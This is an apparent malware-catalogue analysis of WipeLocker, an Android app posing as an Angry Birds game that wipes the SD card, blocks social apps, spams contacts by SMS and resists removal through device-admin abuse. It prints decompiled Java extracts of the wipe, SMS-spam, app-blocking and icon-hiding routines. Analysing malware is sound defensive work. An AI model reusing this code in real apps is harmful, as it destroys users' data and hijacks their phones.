WipeLocker

September 2014

Summary

Erase data on SD card and block social applications

GroDDViewer graphs:

Details

WipeLocker is a malware discovered in September 2014. Its purpose is to wipe off the SD card and block certain social apps while displaying a hacking message. It also sends SMS messages to victim’s contacts. The malware presents itself as a fake Angry Bird Transformers game.

Once the application is launched, the main activity performs three actions.

Stage 1: Starting the malicious service

The application first starts the service IntentServiceClass. Note that this service can also be started by a BOOT_COMPLETED receiver named BootReceiver. The purpose of this service is to schedule the execution of MyServices.getTopActivity() every 0.5 seconds and MyServices.Async_sendSMS() every 5 seconds.

getTopActivity() is a function that checks the current foreground activity and if it is the SMS/MMS Android app, Facebook, Hangouts or WhatsApp, it displays a fullscreen image “Obey or Be Hacked” on the screen making impossible to use those apps.

Async_sendSMS() is an AsyncTask that sends a text message to all the victim’s contacts. It will spam the message “HEY!!! <contact_name> Elite has hacked you.Obey or be hacked” every 5 seconds.

Stage 2: Activating the device administration features

The second action of the malware is to ask the user to activate the device administration features of the app. If the user declines, the app will ask again, over and over, until the user accepts to do so. Administration features allow an application to perform sensitive operations such as wiping the device content or enforcing a password security policy. The file res/xml/device_admin_sample.xml lists the operations the application wishes to handle. The content of this file is however empty, which means that the application will not handle any sensitive operations. In fact, the only purpose of this stage is to make the app much harder to uninstall because device administrators cannot be uninstalled like normal apps. If the user accepts, the app will close and remove its icon from the launcher, with the same code as SaveMe.

Stage 3: Wiping off the SD card

The last action performed by the malware is the deletion of all the files and directories of the external storage. Even if the user declined the device administration features, the function wipeMemoryCard() is called. This function uses Environment.getExternalStorageDirectory() to get the path to the external storage, and then calls File.listFiles() for iterating on files and uses File.delete() to delete each of them.

Stage 4: Intercepting SMS

A last feature that comes with the malware is the interception of incoming SMS. It is simply a receiver named SMSReceiver that is triggered by the SMS_RECEIVED intent. When an SMS is received, the malware automatically answers to the sender with the message “Elite has hacked you.Obey or be hacked”. The victim is not notified by the system about any incoming SMS because the receiver has a high priority (2147483647 in the manifest) and calls abortBroadcast() just after reading the message.

Other resources

Triggering

The icon launcher triggers all the features. A reboot of the device only triggers the service IntentServiceClass.

Caracteristics

Malware type :

  • Bricker / Eraser

Attacks :

  •   Confidentiality

  •   Integrity

  •   Availability

  •   Normal use

Infection technique : Standalone application

Malicious code type :

  • Use Java code

Hidding techniques :

  • Remove its launcher icon

Triggering techniques :

  • Executed at launch
  • Waits for a particular intent

Samples

Java source code extracts:

onCreate.java is the function called when the app is launched. We can clearly see the 3 steps described in the details section.
wipeMemoryCard.java is the function used to erase all data on SD card, we can see inside a call to another function : wipeDirectory().
Async_sendSMS.java is the AsyncTask of the MyServices class which send SMS messages every 5 seconds.
getTopActivity.java is the function executed every 0.5 seconds by MyServices in order to block social apps.
HideAppFromLauncher.java is the function used to hide the launcher icon when the app become a device administrator.

onCreate.java

// in file com/elite/MainActivity.java

protected void onCreate(final Bundle bundle) {

	super.onCreate(bundle);
	this.setContentView(2130903040);

	//Here are the 3 steps we described :
	this.startService(new Intent(this.getApplicationContext(), IntentServiceClass.class));
	new DeviceManager().activateDeviceAdmin((Activity)this, 1000);
	this.wipeMemoryCard();
}

wipeMemoryCard.java

// in file com/elite/MainActivity.java

public void wipeMemoryCard() {

	final File file = new File(Environment.getExternalStorageDirectory().toString());
	try {
		final File[] listFiles = file.listFiles();

		if (listFiles != null && listFiles.length > 0) {

			for (int length = listFiles.length, i = 0; i < length; ++i) {

				final File file2 = listFiles[i];

				//If it's a directory
				if (file2.isDirectory()) {
					wipeDirectory(file2.toString());
					file2.delete();
				}
				//If it's a file
				else { file2.delete(); }
			}
			return;
		}
		file.delete();
	}
	catch (Exception ex) {}
}

Async_sendSMS.java

// in file com/elite/MyServices.java
// extract of the AsyncTask "Async_sendSMS"

Thread.sleep(5000L);
final Cursor query = this.contextTask.getContentResolver().query(ContactsContract$CommonDataKinds$Phone.CONTENT_URI, 
								  null, null, null, null);
while (query.moveToNext()) {
	this.this$0.sendSMS(this.contextTask, query.getString(query.getColumnIndex("data1")), 
			    "HEY!!! " + query.getString(query.getColumnIndex("display_name")) 
			    + " " + this.contextTask.getResources().getString(2131230726));
}
query.close();

getTopActivity.java

// in file com/elite/MyServices.java

public void getTopActivity(final Context context) {

	//Getting the foreground activity
	final String packageName = ((ActivityManager)context.getSystemService("activity"))
				   .getRunningTasks(1).get(0).topActivity.getPackageName();

	if ("com.facebook.katana".equalsIgnoreCase(packageName) || "com.google.android.talk".equalsIgnoreCase(packageName)
	     || "com.whatsapp".equalsIgnoreCase(packageName) || "com.android.mms".equalsIgnoreCase(packageName))
	{
		final Intent intent = new Intent(context, LockScreen.class);
		intent.setFlags(335577088);
		context.startActivity(intent);
	}
}

HideAppFromLauncher.java

// in file com/elite/MainActivity.java

public void HideAppFromLauncher(final Context context) {
	while (true) {
		try {
			context.getPackageManager().setComponentEnabledSetting(this.getComponentName(), 2, 1);
			// 2 = COMPONENT_ENABLED_STATE_DISABLED; 1 = DONT_KILL_APP
			this.finish();
		}
		catch (Exception ex) {
			ex.printStackTrace();
			continue;
		}
		break;
	}
}